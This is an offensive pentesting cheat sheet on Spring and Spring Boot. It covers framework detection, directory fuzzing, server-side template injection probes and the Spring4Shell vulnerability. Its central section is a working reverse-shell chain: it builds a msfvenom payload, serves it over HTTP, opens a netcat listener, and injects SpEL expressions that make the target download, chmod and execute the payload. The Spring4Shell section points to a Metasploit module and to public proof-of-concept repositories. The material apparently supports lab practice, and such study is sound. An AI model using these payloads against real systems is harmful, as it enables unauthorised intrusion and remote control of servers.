# Spring Pentesting

Spring is an application framework and inversion of control container for the Java platform.

### Framework Detection <a href="#framework-detection" id="framework-detection"></a>

If we get the **Whitelabel Error Page**, the website may use **Spring Boot**.

### Enumeration <a href="#enumeration" id="enumeration"></a>

#### Directory Discovery <a href="#directory-discovery" id="directory-discovery"></a>

```
ffuf -u https://example.com/FUZZ -w seclists/Discovery/Web-Content/spring-boot.txt
```

### SSTI <a href="#ssti" id="ssti"></a>

#### Discovery <a href="#discovery" id="discovery"></a>

If there is an input form, such as a search form, or URL parameter which the parameter is reflected in the website, you may be able to find the vulnerability to the server-side template injection.

Try them:

```
2*2
#{2*2}
*{2*2}
```

Then you can also check more about that.

```
{"dfd".replace("d", "x")}
#{"dfd".replace("d", "x")}
*{"dfd".replace("d", "x")}

// ---------------------------------------

// the desired output of the above...
"xfx"
```

#### Reverse Shell <a href="#reverse-shell" id="reverse-shell"></a>

First generate the payload of the reverse shell which will be downloaded from the website.

```
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<local-ip> LPORT=<local-port> -f elf > r.elf
```

Start a local web server to allow the website to download the payload named “r.elf”

```
python3 -m http.server 8000
```

In another terminal, open listener for getting the reverse shell.

```
nc -lvnp <local-port>
```

In the target website,

```
*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("wget http://<local-ip>:8000/r.elf")}

*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("chmod 777 ./r.elf")}

*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("./r.elf")}
```

Finally we should see to get the shell.

### Spring4Shell (CVE-2022-22965) <a href="#spring4shell-cve-2022-22965" id="spring4shell-cve-2022-22965"></a>

**Spring4Shell** is a vulnerabilitiy to remote code execution in **Spring** framework. It affects a component in **Spring Core** which is the heart of the framework.\
It is identified as a bypass of the patch for **CVE-2010-1622**.

#### Exploitation <a href="#exploitation" id="exploitation"></a>

We can use **Metasploit** for this exploitation.

```
msfconsole
msf> use exploit/multi/http/spring_framework_rce_spring4shell
```

Alternatively, various PoCs are available in **GitHub repositories**.

* <https://github.com/BobTheShoplifter/Spring4Shell-POC>
* <https://github.com/Leovalcante/spring4shell>
* <https://github.com/me2nuk/CVE-2022-22965>

### References <a href="#references" id="references"></a>

* [TryHackMe](https://tryhackme.com/room/spring4shell)